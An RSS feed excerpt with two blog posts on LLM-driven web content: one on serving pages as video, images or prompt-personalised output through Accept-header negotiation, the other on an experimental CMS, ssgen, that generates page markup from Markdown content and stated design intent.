<p>My version of Chrome offers this to every page that I navigate to:</p>
<pre tabindex="0"><code>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
</code></pre><p>That&rsquo;s a lot of things that can be handled by the browser. But what do we do with this data on the server?</p>
<p>Well, a lot and not a lot at the same time. CDNs make extensive use of it for things like optimizing image delivery - if you know you can send an avif to millions of users, then transcoding the image while maintaining the same quality is a huge benefit to both the CDN and to users. But for how we think about serving content optimized for the mode of interaction? I really just don&rsquo;t see it, and for good reason - you are in a browser, we expect a request to probably return HTML. Well the guidance says to prefer the highest <code>q</code>. It&rsquo;s kinda neat to see that the default request has <code>*/*</code> and a range of image formats.</p>
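<p>To make the <code>q</code> handling concrete, here is a minimal TypeScript sketch of how a server might pick a response format from an <code>Accept</code> header. The function names (<code>parseAccept</code>, <code>qualityFor</code>, <code>negotiate</code>) are made up for illustration and are not taken from <code>ssgen</code> or any library, and the sketch ignores every parameter other than <code>q</code>.</p>
<pre tabindex="0"><code class="language-typescript" data-lang="typescript">// Hypothetical helper types and names, for illustration only.
type MediaRange = { type: string; q: number };

// Split an Accept header into media ranges with their q-values.
function parseAccept(header: string): MediaRange[] {
  return header
    .split(",")
    .map((part) => {
      const [type, ...params] = part.trim().split(";").map((s) => s.trim());
      // A range without an explicit q parameter defaults to q=1.
      const qParam = params.find((p) => p.startsWith("q="));
      const q = qParam ? Number(qParam.slice(2)) : 1;
      return { type: type.toLowerCase(), q: Number.isNaN(q) ? 0 : q };
    })
    .filter((range) => range.type.length > 0);
}

// The most specific matching range decides the quality of an offered type:
// an exact match first, then "type/*", then the full wildcard.
function qualityFor(offered: string, ranges: MediaRange[]): number {
  const [major] = offered.split("/");
  const candidates = [offered, major + "/*", "*/*"];
  for (const candidate of candidates) {
    const match = ranges.find((r) => r.type === candidate);
    if (match) return match.q;
  }
  return 0; // Not acceptable to the client.
}

// Return the offered type with the highest q, or null if none is acceptable.
// On a tie, the type listed first in `offered` wins.
function negotiate(header: string, offered: string[]): string | null {
  const ranges = parseAccept(header);
  let best: string | null = null;
  let bestQ = 0;
  for (const type of offered) {
    const q = qualityFor(type, ranges);
    if (q > bestQ) {
      best = type;
      bestQ = q;
    }
  }
  return best;
}
</code></pre>
<p>With the Chrome header above, a server that can offer both <code>text/html</code> and <code>video/mp4</code> would pick <code>text/html</code>, because the video only matches the <code>*/*;q=0.8</code> wildcard. Send <code>Accept: video/mp4</code> on its own and the same server would pick the video.</p>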
<p>There&rsquo;s something around this that got me thinking&hellip;</p>
<p>I&rsquo;ve been spending a fair bit of time playing and thinking about how a future Web Browser might work. As I try to understand how people are using the internet, you can see the rise of closed platforms and specifically video platforms. Ben Thompson has frequently noted that text is easy to share, <a href="https://stratechery.com/2020/the-tiktok-war/">but Video is what the majority of people consume or at least want to consume</a>. Now the web, while being the most versatile hypermedia platform the world has ever seen is dominated by text and more and more user-time is transitioning on to other platforms. It seems like a risk to me, so what if the final form for success for the web is whatever the user wants in whatever format they want?</p>
<p>I recently spent some time wondering how we might have more of a &lsquo;lean-back&rsquo; experience in the browser, that is a simpler way to scan new content and then engage with it. A couple of years back I built a screenshot based &lsquo;TikTok&rsquo; like list of articles that I might be interested in (it used to be on Glitch RIP). Screenshots are cool and all, but with the introduction of <code>veo3</code> I thought it might be interesting to see if we can create a video out of the contents of a web page.</p>
<p><a href="http://flickity.val.run">Flickity</a> is a surprisingly fun experiment. I screenshot the url, extract the markdown and use an LLM to generate a script. The script is then passed into <code>veo3</code> and now we have a list of overviews of the pages. Yes, the videos aren&rsquo;t perfect—the text coherence is a little off—but I thought it was a neat experiment.</p>
<figure>
  <video src='/images/flickity.mp4' style="width:100%" controls></video>
  <figcaption>
    <p>Flickity Web Demo (I don&#39;t know why there&#39;s no sound in the video)</p>
  </figcaption>
</figure>
<p>Flickity just made me think a lot about the future of the web being truly a multimodal hypermedia platform that is shaped to the user&rsquo;s preference.</p>
<p>With LLMs we have the ability to convert almost any content into any form of content and I think this will be a super-power of the web and the browser. In <a href="https://aifoc.us/interception/">interception</a> I explored what it might be like for the browser to mediate and control the response from a server (for example to only ever summarize the content) - it was an interesting experiment in that it shows that the web is more flexible than we take for granted, but highlights that morphing content in the client has a lot of potential issues ranging from lack of developer control all the way to breaking expectations of how JavaScript might work.</p>
<p>We are starting to see services and web apps that transform content from one form to another: NotebookLM can create podcasts, videos, interactive quizzes, mindmaps out of pages and source content. <a href="https://research.google/blog/generative-ui-a-rich-custom-visual-interactive-user-experience-for-any-prompt/">Google search has started to generate &ldquo;interactives&rdquo; inside the AI mode</a>. Why isn&rsquo;t this something the browser can just do or at least the developer can indicate support for from the server? Why not make this available to every single site on the user&rsquo;s behalf? HTML into video. HTML into an image. Static HTML into an interactive web app&hellip; Video into article; Audio file into vide&hellip; well, anything into anything else?</p>
<p>We have 30 years of being able to negotiate the content type and we have the technology via LLMs, having the two combined might be a powerful concept for the future of the web. In <code>ssgen</code> (my <a href="https://aifoc.us/headless-stopgap/">experimental</a> &ldquo;<a href="https://github.com/PaulKinlan/ssgen">CMS</a>&rdquo;) I wanted to explore if I can offer a way to have the server return whatever the preferred output format is.</p>
<p>Today, web browsers have a pretty permissive Accept header, so there&rsquo;s nothing really stopping us from returning a format that we think is appropriate. What if we gave servers more ability to determine the best way to return the content?</p>
<p>If you want the page as a video, like in Flickity Web, you can:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>curl https://ssgen.paulkinlan-ea.deno.net/carousel -H <span style="color:#e6db74">&#34;Accept: video/mp4&#34;</span>
</span></span></code></pre></div><p>If you want an image representation of the experience, you can:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>curl https://ssgen.paulkinlan-ea.deno.net/carousel -H <span style="color:#e6db74">&#34;Accept: image/jpeg&#34;</span>
</span></span></code></pre></div><p>Below are the first renderings I got from the demo (image, webm)</p>
<figure><img src="/images/hyper-content-test-image.jpeg"
    alt="literal image of the content"><figcaption>
      <p>literal image of the content</p>
    </figcaption>
</figure>

<figure>
  <video src='/images/hyper-content-test.webm' style="width:100%" controls></video>
  <figcaption>
    <p>literal video of the content</p>
  </figcaption>
</figure>
<p>I still need to tweak the prompts because right now it will return a literal video of a carousel that meets the requirements, but this literal interpretation of the content made me think about what the user might want.</p>
<p>I also make heavy use of Gems in Gemini and instructions in ChatGPT. It made me think if there is ever a world where we could personalise every response from the sites to the explicit needs of the user more. How might I want my preferences to be communicated to a page?</p>
<p>There&rsquo;s a couple of ways to think about it, maybe the browser makes a request to the resource, loads it and then processes it. Or maybe we pass some notion of our preferences to the server and have the content be negotiated along with our preference. We already express some preference through <code>Accept-Language</code>, what if we could do more? Could we have a way to pass user preference by a prompt?</p>
<pre tabindex="0"><code>Accept-Prompt: I am a person who likes kittens. Please make sure the output has a kitten influence. Please ensure that all units are metric, I hate imperial measurements (like really, wtf?). Please ensure that you output in dark-mode.
</code></pre><p>I thought it might be fun to test this out:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>curl https://ssgen.paulkinlan-ea.deno.net/carousel -H <span style="color:#e6db74">&#34;Accept-Prompt: I am a person who likes kittens. Please make sure the output has a kitten influence.&#34;</span>
</span></span></code></pre></div><figure><img src="/images/hyper-content-kittens.png"
    alt="literal kitten influence"><figcaption>
      <p>literal kitten influence</p>
    </figcaption>
</figure>

<p>Having a &ldquo;prompt&rdquo; on every request is <strong>very unlikely to happen</strong>; a prompt can contain very personal data and this means that it shouldn&rsquo;t be sent on the first request. We saw from things like the Topics API that this wasn&rsquo;t something the ecosystem thought was acceptable. User opt-in though via a client-hint (and only when there is strict CSP or limited access to hardware)&hellip;? Maybe that is interesting.</p>
<p>I don&rsquo;t know where the web is going to go in this regard and I don&rsquo;t think what is in this post is viable <em>today</em> given the performance of LLMs, but when the <a href="/latency/">latency</a> is solved and we have ways to protect users and site owners from prompt exfiltration and impersonation, I do think we should be looking at how User Agents can act more on behalf of the user, especially in ways that go beyond the UA being an &ldquo;autonomous agent&rdquo;. We are also going to have to deal with the tension that publishers and site owners want their exact output to be what is presented to the user, while the user, well, likely wants it <em>their</em> way, and Chat apps give them that ability.</p>
<p>The thing is, the web is a hypermedia platform and it can be far more flexible than we treat it today. I think we have the opportunity to experiment at the forefront of the platform (client and server) and keep the web as <em>the</em> platform for all computing interaction.</p>
]]></content:encoded></item><item><title>headless stopgap</title><link>https://aifoc.us/headless-stopgap/</link><pubDate>Sun, 23 Nov 2025 10:00:00 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/headless-stopgap/</guid><description>&lt;p>I remember my early days building for the web. We had no separation of concerns. We used &lt;code>&amp;lt;font&amp;gt;&lt;/code> and &lt;code>&amp;lt;center&amp;gt;&lt;/code> tags, transparent &lt;code>spacer.gif&lt;/code>s, and complex table layouts to force our content into a shape. Presentation and content were a single, messy soup.&lt;/p>
&lt;p>My first encounter with CSS in Netscape Navigator 4 was a mind-blowing moment. It was the first time I was confronted with the &lt;em>idea&lt;/em> that you could (and should) separate the document&amp;rsquo;s structure (HTML) from its presentation (CSS).&lt;/p></description><content:encoded><![CDATA[<p>I remember my early days building for the web. We had no separation of concerns. We used <code>&lt;font&gt;</code> and <code>&lt;center&gt;</code> tags, transparent <code>spacer.gif</code>s, and complex table layouts to force our content into a shape. Presentation and content were a single, messy soup.</p>
<p>My first encounter with CSS in Netscape Navigator 4 was a mind-blowing moment. It was the first time I was confronted with the <em>idea</em> that you could (and should) separate the document&rsquo;s structure (HTML) from its presentation (CSS).</p>
<p>This concept was cemented for the entire industry by the CSS Zen Garden. It was the ultimate demo: one single HTML file, hundreds of completely different visual designs. This idea, that content and presentation are two different things, has stuck with me ever since.</p>
<p>For the past decade, we&rsquo;ve been running with this idea. Headless CMSs are the logical conclusion of that CSS Zen Garden-era thinking. We put our pure content in an API and make our presentation layer (a React app, usually) completely separate. We thought we&rsquo;d finally achieved the ultimate separation.</p>
<p>But it&rsquo;s a trap. We&rsquo;ve just relocated the coupling. Instead of being locked to a WordPress template loop, we&rsquo;re locked to <code>contentful.getEntry()</code> loops. We&rsquo;re still manually mapping <code>fields.heroTitle</code> to <code>&lt;h1&gt;</code> and <code>fields.heroImage.url</code> to <code>&lt;img&gt;</code>. This isn&rsquo;t freedom, it&rsquo;s a 1:1 mapping to a rigid JSON schema instead of a flexible template.</p>
<p>Something has been gnawing away at me because I don&rsquo;t think we&rsquo;re at our final form of content management by a long way. As I explored in &ldquo;<a href="https://aifoc.us/whither-cms/">Whither CMS?</a>&rdquo;, for years &ldquo;normal people&rdquo; and local businesses have fled to walled gardens like Facebook, not because they <em>want</em> to, but because the alternative is too hard. When I moved to North Wales, I saw this firsthand. They know their content, their goals, and their intent (name, address, pictures, booking forms), but the barriers of design, cost, and technical skills are too high.</p>
<p>That post also highlighted a key gap: the data shows popular CMSs (like WordPress) are dominant in the web&rsquo;s massive &ldquo;long tail,&rdquo; but not where people actually spend their time. We&rsquo;re still failing to provide tools for the <em>vast majority</em> of people who just want a simple, independent presence.</p>
<p>I do think with the introduction of Large Language Models we are on the verge of the <em>next</em> great separation. The first was <code>(Content + Style)</code> -&gt; <code>(Content) + (Style)</code> with CSS and CMS systems. The new one is <code>(Rigid Components)</code> -&gt; <code>(Pure Intent)</code> that will enable us to move from &ldquo;structured data&rdquo; to &ldquo;intent.&rdquo;</p>
<p>It seems that LLMs will finally make this possible by acting as the bridge, allowing anyone to simply <em>describe</em> what they want, starting with their content (the most important part) and <strong>progressively layering</strong> on style <em>and</em> functionality.</p>
<p>The &ldquo;block editor&rdquo; (Gutenberg, Notion, etc.) was a step in the right direction, but it&rsquo;s still a &ldquo;what you see is what you get&rdquo; system that mashes content and presentation into a messy HTML blob. You can&rsquo;t easily change the markup of every &ldquo;Two Column&rdquo; block on your site.</p>
<p>The new model requires a hard separation of &ldquo;Content&rdquo; and &ldquo;Chrome.&rdquo;</p>
<ul>
<li><strong>Content:</strong> The text, the image URL, the list items. This is sacred and <em>must not be changed</em> by the LLM. In my experimental <a href="https://github.com/PaulKinlan/ssgen">ssgen</a> project, this is just raw Markdown.</li>
<li><strong>Chrome:</strong> The <code>&lt;div&gt;</code>s, the <code>grid</code>, the <code>shadow-lg</code>, the <code>rounded-xl</code>. This is the <em>shell</em> that presents the content. It is disposable and should be generated.</li>
</ul>
<p>The LLM&rsquo;s role is to act as a just-in-time &ldquo;chrome generator.&rdquo; It reads the pure content (<code># My Title</code>) and wraps it in the <em>appropriate</em> presentation (<code>&lt;div class=&quot;hero&quot;&gt;&lt;h1 class=&quot;text-4xl...&quot;&gt;My Title&lt;/h1&gt;&lt;/div&gt;</code>) based on context, leaving the content itself pristine.</p>
<p>Right now, we ask people to style with <code>tailwind.config.js</code>, <code>_variables.css</code>, and create massive design system libraries. A new model could be &ldquo;Intent.&rdquo; Instead of <em>coding</em> the style and the intent, we <em>describe</em> it. The LLM acts as the style-transfer engine.</p>
<p>My <code>ssgen</code> experiment shows that this is possible in three ways:</p>
<ol>
<li><strong>Textual Intent (The Brand File):</strong> We give the LLM a simple &ldquo;brand.md&rdquo; file.
<em>&ldquo;Our brand is professional and minimalist. Use a dark blue primary color (#0a2351), a serious serif font for headings, and generous white space.&rdquo;</em></li>
<li><strong>Visual Intent (The Screenshot):</strong> We give the LLM an image.
<em>&ldquo;Make it look like this.&rdquo;</em></li>
<li><strong>Functional Intent:</strong> Describe what you need to do and <a href="/hypermedia/">hypermedia</a> can make it possible.</li>
</ol>
<p>The LLM uses this &ldquo;intent&rdquo; to inform how it builds the &ldquo;chrome&rdquo;, enabling us to bridge the gap between the author and the final code.</p>
<p>But how can we think about describing intent while enabling ease of authorship? One of the things that I loved about HTML was its ability to render even if the input HTML was malformed in some way. No <code>&lt;/p&gt;</code>, not a problem. What if we could extend that flexibility even further into describing what you want?</p>
<p>If as an author I could describe that I want a <code>&lt;contact-form&gt;</code> and what I want it to achieve even if I don&rsquo;t know HTML, that could be pretty powerful.</p>
<p>Maybe I could write something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Markdown" data-lang="Markdown"><span style="display:flex;"><span># Contact me for availability
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">contact-form</span>&gt;
</span></span><span style="display:flex;"><span>mail to: paul@aifoc.us
</span></span><span style="display:flex;"><span>I need the users name, email address, message and date they would like an appointment
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">contact-form</span>&gt;
</span></span></code></pre></div><p>Should produce something like:
<figure><img src="/images/contact-form.png"
    alt="ssgen&lsquo;ed form"><figcaption>
      <p><code>ssgen</code>&lsquo;ed form</p>
    </figcaption>
</figure>
</p>
<p>Oh - <a href="https://ssgen.paulkinlan-ea.deno.net/contact-form">wait it does</a> | <a href="https://github.com/PaulKinlan/ssgen/blob/main/content/contact-form.md">Code</a>.</p>
<p>This brings us to what I think is the most powerful idea. Back in 2016, I wrote a post called &ldquo;<a href="https://paul.kinlan.me/custom-elements-ecosystem/">Custom Elements: an ecosystem. Still being worked out</a>.&rdquo; The dream was that semantic, custom HTML elements could become a universal <em>interchange format</em>. An author should be able to write <code>&lt;share-button&gt;</code> or <code>&lt;aspect-image&gt;</code>, and the <em>developer</em> or <em>platform</em> would provide the best <em>implementation</em> for that context (whether it was Polymer, AMP, or just vanilla JS). The author&rsquo;s HTML would be stable, even if the underlying tech changed.</p>
<p>That future did not happen. As the post warned, framework ecosystems exploded, and each one built its <em>own</em> proprietary, prefixed component model (<code>&lt;amp-img&gt;</code>, <code>&lt;iron-image&gt;</code>). This fragmented the composability of the platform. We didn&rsquo;t get an ecosystem; we got a set of high-walled gardens that locked developers in. A React <code>&lt;ProductCard&gt;</code> is almost useless in a Vue app. However, if you look at how people use frameworks like React, <code>&lt;ProductCard&gt;</code> and <code>&lt;ContactForm&gt;</code> are surprisingly good, descriptive definitions of the intent of what is being created.</p>
<p>Can we use LLMs to finally deliver on that original vision of semantic, functional HTML elements that are <em>implementation agnostic</em>?</p>
<p>I think there&rsquo;s a massive opportunity to cement the web as the place for all content and I think the LLM is the missing piece that can finally deliver on the concept I set out in 2016 to bind an implementation to an author&rsquo;s intent.</p>
<p>Consider the two roles:</p>
<ol>
<li><strong>The Author&rsquo;s Job:</strong> Write pure semantic <em>intent</em>.</li>
<li><strong>The LLM&rsquo;s Job:</strong> Act as the &ldquo;intelligent renderer&rdquo; (e.g., <code>ssgen</code>). It sees these tags, understands their <em>function</em> and <em>contract</em>, and generates the <em>entire, correct, and secure implementation</em> (the <code>&lt;iframe&gt;</code>, the <code>&lt;form&gt;</code>, the Stripe.js <code>&lt;script&gt;</code>) on the fly, <em>using the brand guidelines</em>.</li>
</ol>
<p>I think this is a decoupling that we should explore more. Authors don&rsquo;t need to know HTML, JavaScript, or even what framework is being used. They just declare their high-level intent, and the LLM handles the implementation, which might help us to break the framework lock-in for good.</p>
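<p>To make the split between the two roles a little more concrete, here is a minimal sketch of the first thing an &ldquo;intelligent renderer&rdquo; might do: find the author&rsquo;s functional tags and turn them into instructions for the model. This is not how <code>ssgen</code> is implemented; <code>findFunctionalElements</code>, <code>buildRendererPrompt</code> and the prompt wording are all hypothetical names I made up for illustration.</p>

```typescript
// Hypothetical sketch: none of these names come from ssgen itself.
interface FunctionalElement {
  tag: string; // e.g. "checkout-button"
  attributes: { [name: string]: string };
}

// Find custom-element style tags (names containing a hyphen) in author content.
function findFunctionalElements(content: string): FunctionalElement[] {
  const elements: FunctionalElement[] = [];
  const tagPattern = /<([a-z][a-z0-9]*(?:-[a-z0-9]+)+)((?:\s+[^<>]*?)?)\s*\/?>/g;
  let tagMatch: RegExpExecArray | null;
  while ((tagMatch = tagPattern.exec(content)) !== null) {
    const attributes: { [name: string]: string } = {};
    // Accept double-quoted, single-quoted and unquoted attribute values.
    const attrPattern = /([a-zA-Z_:][\w:.-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>\/]+))/g;
    let attrMatch: RegExpExecArray | null;
    while ((attrMatch = attrPattern.exec(tagMatch[2])) !== null) {
      const value =
        attrMatch[2] !== undefined ? attrMatch[2]
        : attrMatch[3] !== undefined ? attrMatch[3]
        : attrMatch[4];
      attributes[attrMatch[1]] = value;
    }
    elements.push({ tag: tagMatch[1], attributes: attributes });
  }
  return elements;
}

// Assemble the text handed to the model: brand guidelines, one line per
// functional element describing its "contract", then the untouched content.
function buildRendererPrompt(content: string, brandGuidelines: string): string {
  const contracts = findFunctionalElements(content).map(function (el) {
    return "- <" + el.tag + "> with attributes " + JSON.stringify(el.attributes);
  });
  return ["Render the content below as complete, secure HTML.",
    "Follow these brand guidelines: " + brandGuidelines,
    "Replace each functional element with a working implementation:"]
    .concat(contracts, ["", content])
    .join("\n");
}
```

<p>The author&rsquo;s content passes through unchanged; only the instructions around it vary, which is the point of the decoupling.</p>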
<p>Consider this example of functional elements that <code>ssgen</code> can already generate:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Markdown" data-lang="Markdown"><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span>prompt: element.md
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>This is a test page testing how elements being automatically generated.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span># Google Map and Pin
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">google-map</span>&gt;&lt;<span style="color:#f92672">pin-location</span> <span style="color:#a6e22e">city</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;Ruthin&#34;</span>/&gt;&lt;/<span style="color:#f92672">google-map</span>&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span># Google Font
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">google-font</span> <span style="color:#a6e22e">font</span><span style="color:#f92672">=</span><span style="color:#e6db74">Lobster</span> <span style="color:#a6e22e">size</span><span style="color:#f92672">=</span><span style="color:#e6db74">30pt</span>&gt;Hello World&lt;/<span style="color:#f92672">google-font</span>&gt;
</span></span></code></pre></div><figure><img src="/images/elements-ssgen.png"
    alt="Google Map and Google fonts generated by LLM"><figcaption>
      <p>Google Map and Google fonts generated by LLM</p>
    </figcaption>
</figure>

<p>Demo: <a href="https://ssgen.paulkinlan-ea.deno.net/element">View Element Demo</a>
Code: <a href="https://raw.githubusercontent.com/PaulKinlan/ssgen/refs/heads/main/content/element.md">View on GitHub</a></p>
<p>These elements were entirely made up as a way to explain what I wanted in the page. The LLM understood the intent of what I wanted and generated the correct code to make it happen.</p>
<p>I could imagine a world where you could write:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>Welcome to my site about travel! Here is my trip to the tower of London:
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">google-map</span> <span style="color:#a6e22e">location</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;Tower of London&#34;</span> <span style="color:#a6e22e">zoom</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;14&#34;</span> /&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>You can book tickets using here:
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">checkout-button</span> <span style="color:#a6e22e">item</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;prod_123xyz&#34;</span> <span style="color:#a6e22e">price</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;19.99&#34;</span> <span style="color:#a6e22e">currency</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;GBP&#34;</span> /&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>If you want more information about my travels, sign up to my newsletter:
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">newsletter-signup</span> <span style="color:#a6e22e">form-id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;my-campaign-id&#34;</span> /&gt;
</span></span></code></pre></div><p>I think this is pretty fun. Exploring this model further, we can create more complex elements.</p>
<p>How about a carousel of images?</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Markdown" data-lang="Markdown"><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span>prompt: element.md
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>This is a test page to test elements that could work by being generated
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>in this demo we are going to create a carousel of images.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">carousel</span>&gt;
</span></span><span style="display:flex;"><span>  Img url=https://picsum.photos/200/300 link_text=paul kinlan link=https://paul.kinlan.me
</span></span><span style="display:flex;"><span>  Img url=https://picsum.photos/200/300 link_text=web dev link=https://web.dev
</span></span><span style="display:flex;"><span>  Img url=https://picsum.photos/200/300 link=https://developer.chrome.com link_text=&#34;chrome.&#34; ; open the link in a new window
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">carousel</span>&gt;
</span></span></code></pre></div><figure><img src="/images/carousel-ssgen.png"
    alt="Carousel generated by LLM"><figcaption>
      <p>Carousel generated by LLM</p>
    </figcaption>
</figure>

<p>Demo: <a href="https://ssgen.paulkinlan-ea.deno.net/carousel">View Carousel Demo</a>
Code: <a href="https://github.com/PaulKinlan/ssgen/blob/main/content/carousel.md">View on GitHub</a></p>
<p>The LLM understood the intent of what I wanted and generated a working carousel with navigation buttons, image links, and accessibility features.</p>
<p>Finally, consider a full portfolio page where I provide the content and a screenshot of the style I want:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Markdown" data-lang="Markdown"><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span>prompt: element.md
</span></span><span style="display:flex;"><span>style:
</span></span><span style="display:flex;"><span>  image: images/screen.png
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span># Portfolio Showcase
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## My Creative Work
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>Explore a collection of my recent projects and designs.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## Featured Projects
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">### Project Alpha
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>A revolutionary web application that changed the industry.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">### Project Beta
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>Beautiful design meets functionality in this mobile app.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">### Project Gamma
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>Enterprise solution delivering results at scale.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## About Me
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>I&#39;m a designer and developer passionate about creating beautiful, functional digital experiences.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## Contact
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>Let&#39;s work together on your next project!
</span></span></code></pre></div><p>Demo: <a href="https://ssgen.paulkinlan-ea.deno.net/style-image-example">View Style Transfer Demo</a>
Code: <a href="https://github.com/PaulKinlan/ssgen/blob/main/content/style-image-example.md">View on GitHub</a></p>
<figure><img src="/images/style-ssgen.png"
    alt="Site generated by LLM with image as source"><figcaption>
      <p>Site generated by LLM with image as source</p>
    </figcaption>
</figure>

<p>As more and more people get used to engaging with LLMs, I think we can start to see a new model for content management and site generation emerge.</p>
<p>The new workflow is simple:</p>
<ol>
<li><strong>You write semantic content</strong> (Markdown + custom functional tags).</li>
<li><strong>You provide stylistic intent</strong> (a brand file, a screenshot, or even a CSS file).</li>
<li><strong>An LLM Renderer (<code>ssgen</code>!)</strong> generates the complete, functional, and on-brand site.</li>
</ol>
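<p>As a rough sketch of the first two steps, this is how a renderer might separate the stylistic intent in the front matter from the semantic content before handing both to the model. It assumes the simple <code>prompt:</code> and <code>style: image:</code> keys used in the examples above and is not a real YAML parser; <code>parsePage</code> and <code>RenderRequest</code> are hypothetical names, not part of <code>ssgen</code>.</p>

```typescript
// Hypothetical sketch: handles only the front matter keys shown in this post.
interface RenderRequest {
  promptFile: string | null; // e.g. "element.md"
  styleImage: string | null; // e.g. "images/screen.png"
  body: string;              // the semantic Markdown content
}

function parsePage(source: string): RenderRequest {
  const request: RenderRequest = { promptFile: null, styleImage: null, body: source };
  const lines = source.split("\n");
  if ((lines[0] || "").trim() !== "---") {
    return request; // no front matter: everything is content
  }
  // Find the line that closes the front matter block.
  let end = -1;
  for (let i = 1; i < lines.length; i++) {
    if (lines[i].trim() === "---") {
      end = i;
      break;
    }
  }
  if (end === -1) {
    return request; // unterminated block: treat everything as content
  }
  let parent = "";
  for (const line of lines.slice(1, end)) {
    const match = /^(\s*)([\w-]+):\s*(.*)$/.exec(line);
    if (match === null) {
      continue;
    }
    // One level of nesting is enough for "style:" followed by "  image: ...".
    const indented = match[1].length > 0;
    const key = indented ? parent + "." + match[2] : match[2];
    if (!indented) {
      parent = match[2];
    }
    if (key === "prompt") {
      request.promptFile = match[3];
    }
    if (key === "style.image") {
      request.styleImage = match[3];
    }
  }
  request.body = lines.slice(end + 1).join("\n").trim();
  return request;
}
```

<p>Everything after the front matter stays as plain Markdown, so the file remains something anyone can write.</p>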
<p>I like the idea that a CMS can become a simple text file (Markdown) that anyone can write, and the &ldquo;renderer&rdquo; is an LLM-powered engine that can understand both the content and the intent of the author.</p>
<p>There are a number of challenges that I can already see you raising.</p>
<p>The first two (latency and deterministic output) are hard stops for many if you think about how today&rsquo;s web is built to ensure that the experience works the same across all browsers and devices for all users. <a href="/latency/">Latency</a> is starting to <a href="https://groq.com">be</a> <a href="https://cerebras.ai">solved</a>. The non-determinism though? This might actually be a feature.</p>
<p>If we embrace this non-determinism, we are now in a world where every navigation to a page is an opportunity to generate the best possible experience for that <em>specific</em> user, on their <em>specific</em> device, for their <em>specific</em> browser, no matter their context.</p>
